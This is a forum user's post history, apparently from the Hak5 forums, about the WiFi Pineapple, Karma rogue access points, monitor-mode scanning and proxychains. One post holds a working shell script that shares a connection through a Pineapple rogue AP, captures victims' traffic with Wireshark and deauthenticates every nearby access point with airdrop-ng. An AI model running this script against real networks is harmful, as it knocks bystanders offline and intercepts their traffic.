telot
-
Posts
803 -
Joined
-
Last visited
-
Days Won
12
Posts posted by telot
-
-
First off, Barry, what are you holding out on us dude? What are those things and for the love of god take my money NOW. They look like Sharp made badass zipit's on crack!
Anyways, what you're looking for Seek0380, is a WIPS (or really WIDS) - a Wireless Intrusion Detection/Prevention System. That is almost exactly opposite of what the pineapple is/does. The pineapple is by very definition a rogue access point, which is exactly what WIPS detect and contain. Meraki has a free access point you can get by watching one of their webinars. It has a feature called Air Marshal, which is WIPS. Get one of those for sure. Keep in mind though, in my initial testing the meraki has not yet detected a karma'd rogue access point hehe. It does however detect every other legit access point in my house/neighborhood.If you want to learn about wifi and get to know the low-ish level stuff, you can do the same thing with an Alfa card (or the pineapple) in monitor mode. This is the fun/cool/hackerish way. I would highly recommend doing it with an alfa card, as its much more supported, and that way you don't have to mess with the pineapples workings (pass it along to a friend who will use it what its intended instead :).
Step 1: Plug in Alfa AWUS036H to laptop
Step 2: Open up virtual machine running Backtrack
Step 3: Forward the alfa to the virtual machine (the alfa may show up as Realtek)
Step 4: Open terminal and type: airmon-ng start wlan0
Step 5: Type in airodump-ng mon0
Step 6: Enjoy seeing every access point (hidden ssid or not) within range
telot
-
Well, what help do you need? Be more specific!
telot
-
Have you checked out irongeek's stuff on the teensy? Check that out for some clues - as ReL1k and irongeek are friends, I'm guessing he's using some of irongeeks teensy HID stuff.
telot
-
More info on what you're after here is needed for us to give a good solution.
Have you looked into mdk3? That simulates SSID's quite well...
telot
-
Please share when you do so! I'd be interested in a script/local website like this for my movie collection.
-
I love the post digip. I didn't want to comment at first, it just seemed like one of those...
Anyways, well put. You're certainly a pillar of the community here and we all appreciate the depth of knowledge you're willing to share with us. You and Mr P. and Infiltrator and Whistle Master (for us pineapplers) make this place what it is, and make it a destination for aspiring white hats.
As for the band, first of all you rock, second of all - TWISTED PAIR! When I saw the name, I totally lol'd.
For those non-cabling nerds:
http://www.twistedpair.co/wp/wp-content/uploads/2012/03/twisted-pair-cable.gif
telot
-
I am receiving my (completely free!) meraki access point today. It has a featured called "Air Marshal" which is their WIPS (zomg what an awesome name for it right?!). I will be testing karma on the raspberry pi along with the mark3 and mark4 pineapples extensively this weekend and in the coming weeks. Stay tuned!
telot
-
Haha - the same thing happened to me when I first got my pineapple. First day, working with the button press script and...bam. The button just sank in and didn't pop back. The alfa's certainly aren't the highest of quality, but you're paying ~$100 for a full-blown pen testing router. I think the trade of affordability vs build quality is worth it in this case.
telot
-
I didn't realize it was only upon upgrading. That clears up a great number of my concerns. Thanks again for being so frank and open with us Seb - as I'm sure you can tell, we really do appreciate it.
telot
-
Heres a script I wrote up for my old mark3 for automated pineappling when connected to a backtrack5 laptop. It will require some modification to work with your setup, but it might be a good way to learn :) Hope you can get some value from it. Cheers
#!/bin/sh#telot presents....:::drum roll:::#One wicked ass nasty script that automates the ICS for the pineapple, begins packet capturing, and deauths every access point/client nearby! Enjoy!#Note that this script makes quite a few assumptions. They are:#You are using backtrack5R1.#Your interface that is connecting to the internet is wlan0#Your interface that is connecting to the pineapple is eth0#You have a alfa realtek usb card capable of monitor mode plugged in.#You have airdrop-ng installed and configured. This is a bit of a pita. If you don't want the deauth functions, comment it out (its at the very bottom of this script).#You have not run wp3.sh or any other network configuration stuff.#You have your pineapple configured to autostart karma at bootup.#This script is meant to run on your laptop upon bootup.#Also in this script, I'm using my smartphone's wifi hotspot feature, and that is why I'm using wpa_supplicant.#So the internet I'm serving up in my pentest lab is actually run through my cellphone.#So if you're dumb enough to do this in public to real people, use the local wifi. You don't want "real" targets eating up your monthly cellphone bandwidth.#Disclaimer: Herp a derp don't use this in public. Don't use this on anyone but your wife. Don't invade other peoples privacy. Don't be an asshole. With great power comes great...blah blah blah#I'm keeping most configuration and capture files on the desktop for ease.cd /root/Desktop/#Again, I'm using wpa because I'm running this through my cellphones hotspot. Remove the wpa_supplicant line and replace it with the below commented line.#iwconfig wlan0 essid EssidOfAPyouWantToUsewpa_supplicant -B Dwext -i wlan0 -c Jack.confdhclient wlan0#Now I just copy pasta'd most of this from the wp3.sh - I use all defaults for my setup, if you do not, change as necessary.#Bring up Ethernet Interface directly connected to Pineappleifconfig eth0 172.16.42.42 netmask 255.255.255.0 up# Enable IP Forwardingecho '1' > /proc/sys/net/ipv4/ip_forwardecho -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to "cat /proc/sys/net/ipv4/ip_forward#clear chains and rulesiptables -Xiptables -Fecho iptables chains and rules cleared#setup IP forwardingiptables -A FORWARD -i wlan0 -o wlan0 -s 172.16.42.0/24 -m state --state NEW -j ACCEPTiptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPTiptables -A POSTROUTING -t nat -j MASQUERADEecho IP Forwarding Enabled#remove default routeroute del defaultecho Default route removed#add default gatewayroute add default gw 192.168.1.1 wlan0echo Pineapple Default Gateway Configured#instructions#echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lanping -c3 172.16.42.1if [ $? -eq 0 ]; thenecho "ICS configuration successful."#echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan"#echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'"#echo "Enter Pineapple password if prompted"#ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'fiecho ""echo "Browse to http://172.16.42.1/pineapple -- Happy Hacking!"echo ""#Now on to the fun stuff!####Now we autostart wireshark and begin capturing the pineapple traffic. I use screen -d -m to hide the console, as for some reason my wireshark is bugged out and hangs a bit.#Remember to screen -r back to it and get rid of it when you're done.screen -d -m wireshark -i eth0 -k -w sharkcap &#This next section requires an additional wifi card that supports monitor mode. I have a usb alfa realtek one (similar to those found in the hakshop).#This is also created in a detached screen. So remember to cleanup when you're done!###Now we deauth every access point around us. Make sure to set a conf file (in my case, I call if yourescrewed.conf) for airdrop with your allows and denys.#I set mine to allow the pineapple & my hotspot and deny everyone else.ifconfig wlan1 upairmon-ng start wlan1cd /pentest/wireless/airdrop-ng/screen -d -m airodump-ng mon0 -w capfile --output-format csvsleep 20python airdrop-ng -i mon0 -t capfile-01.csv -r yourescrewed.conftelot -
digip nailed it. One thing I would add is that windows7 for the user doesn't blow that much. They really did a pretty dang good job with it. If kept up to date, its pretty secure. You pretty much have to be a royal dumbass and download/run a bad exe to get into trouble with windows7. Theres no huge gaping holes like that of XP (i.e. theres no rpc dcom vuln). Now I'm just talking about windows7 here, NOT internet explorer. The most recent IE is decent, for now - but that will soon end. Every previous iteration of IE has been riddled with holes and exploited a hundreds times over, and I see no evidence that their latest and greatest won't befall the same fate. The same goes for most browsers - BeEF and msf browser autopwn will just thrash a browser. But thats not what we're talking about here (I think...)
Yes, for the sysadmin, a windows world can be annoying from what I've heard - I sysadmin ubuntu/centos and my life is AWESOME. Just using windows7 though, whats there to complain about? Every piece of commercial software ever invented runs on windows first, gaming rocks, and its pretty secure these days.
I still run OSX, but only because I love apples hardware - I'm able to do that only because I run at least one Windows7 VM at all times :D
telot
-
Good day my fellow pineapplers!
I'm very curious about the pinenumbers feature. Why would we want anyone (even you Seb/Darren) to track usage on a device that is so easily (and dare I say commonly?) used for illegal/semi-legal things? The very nature of the pineapple is grey-hat at best. Its purpose-built to take advantage of inherent trust vulnerabilities and exploit them. This is great for pentesters, but not everyone who buys/uses a pineapple is a pentester.
I know, I know, theres plenty of disclaimers about not using it for nefarious activities - which protects you guys very well. You certainly need these boilerplate statements when building/supporting this kind of device. But what protects us, the consumers? I understand you're want for usage statistics, just like any dev - you can build better future products and continue to increase functionality in a more efficient way with your current products. With this type of device, with this market you're in, with these privacy-paranoid customers that you have...it just doesn't make sense in my brain. Tell me, why would I allow that on my pineapple?
My second argument is that of contactual privacy afforded to my customers. Say I use the pineapple for legal pen testing as I should, and say I am pentesting a fortune 500 company or even better, a government institution. What happens on a pen test, stays in a pen test. By contractual obligation I can only share the results of the pen test with my customers in their status reports and final report. By allowing the pineapple to send usage statistics and other metrics (even anonymous ones) to the cloud, the pineapple would break that trust I have with my customers and infringe on the contracts I've signed and get paid for.
I understand theres going to be an opt-out function in the gui (and I hope cli support as well) - but I thought I'd explain myself as to why I won't be participating with some of my pineapples. My test pineapples, the one I play with at home, the one I use to rick roll my friends - I will surely leave on for your metrics. Ones that are actually used on jobs, I'm afraid I just can't, and I hope you understand. I'd love to begin a dialog about this, so please let me know your thoughts. Thanks everyone!
telot
-
Haha in 12 minutes he's gotten six responses. We're so damn helpful guys, its ridiculous.
And yet I didn't get a single response to my sslstrip question last week (:::goes and cries in the corner:::)
telot
-
Have you watched all the hak5 episodes on the pineapple? There are several. They totally explain what to expect from the pineapple and (along with the book) how to get started. After that, give the wiki a try. If you've never used a terminal before, checkout Shannons basic terminal usage episodes on HakTip - its a great beginners guide. Watching the hak5 epsidoes about SSH certainly can't hurt, as some of it pertains to the pineapple (reverse ssh). If you need help, you gotta narrow down what you're asking us - What do you want to do with your pineapple and at what point do you get stuck?
telot
-
All I did is follow the instructions to build a Pi-Point (its on raspberrypi.org) which basically just details what you need to apt-get and configure (dnsmasq and hostapd). I then just copied the hostapd file from digininja's site (robin wood, the original karma/jasager/pineapple creator) and thats about it! Give it a shot and if you run into troubles, create a new thread and I'll chime in with any help I can. Good luck!
It was pretty simple, but I can write up a proper how-to if you'd like too :)
telot
-
Whoa. How have we never seen these before? Good find coolgeek!
-
Whoa. That module should be pinned in everyones menu bar less than 5 minutes after that module hits the bar. Thanks fellas!
telot
-
Agreed with digip. If the site you're creating is to be professional at all, you gotta pay. It was easy and fun for me to roll my own, mostly because I just wanted to learn about the LAMP process. I've since stopped it because I just don't give a shit (hence why telot.org is a crappy website). Is there something stopping you from doing that? That way you have total control of everything (you own the hardware, the bandwidth, the software - everything is on your home machine).
So the real question is, what kind of site are you aiming at creating interweb?
-
Good day to everyone
As the subject states, I have a general question regarding proxychains. I've watched the hak5 episode on it (ep 11.19) but I'm curious as to how you guys (fellow white/grey hats) get access to the various ssh servers that you're then chaining together. Do any of you use any so-called "Free Shells"? I've checked out a couple of the free shell providers, but they mostly seem to be crap (fill out these polls, sign up for these 15 credit cards, give us your email to spam, etc). My goal for this is mostly just to play with/test proxychains, i.e. how usable is it, get comfortable with the configuration, etc.
Anyone have any insight into how I can experiment with globetrotting ssh tunnels? Thanks!
telot
-
Crap. I got started on this now...shitty mystery is shitty.
I'll just leave this right here... http://instagram.com/p/TgmdNZDOXP/
Its a brick in the twit wall. Heres more info: http://twit.tv/2012/03/03/the-twit-brick-wall-honor
telot
-
Seb asked me about writing an interceptor module for the Pineapple and it is on my list.
Swoot - I know I speak for many in saying that we're real excited to have that additional functionality in our pineapples. Thanks digininja!
telot
-
Theres really no such thing as a malicious jpeg as far as I know. You can have malicious php code that interacts with jpegs, but thats very different. PDFs are an entirely different animal. A simple google search ("malicious pdf" for example) will turn up lots and lots of information on this.
telot
-
Ha! I just hit your other post first. Thanks very much for the offer Matt. After watching their webinar, I'm considering getting a couple test units from them and if they work out, probably buying a dozen or so for work. I had no idea they even existed until a couple days ago - now that they're on their way to being bought out (and have record growth, 10k customers) I'm tempted to take them seriously. Free ap for my house is also a very nice bonus.
Anyone checkout their Air Marshal service? I'm curious how it "contains" rogue APs. Do they just aireplay -0 them?
telot
-
Sweet! my m12 is on its way right now - I'm so glad to hear that its worked out well for you Matt (also, welcome back!?).
Also, are you in kansas city? Where in this country can you get speeds like that?
telot
Suggestion: Ubertooth Forum
in Questions
Posted
An rfcat/cc1111/toorcon14 badge forums would be awesome as well! Or maybe just a software defined radio forum. Either way theres very little community-related stuff (besides an irc full of lurkers) for the SDR stuff...
telot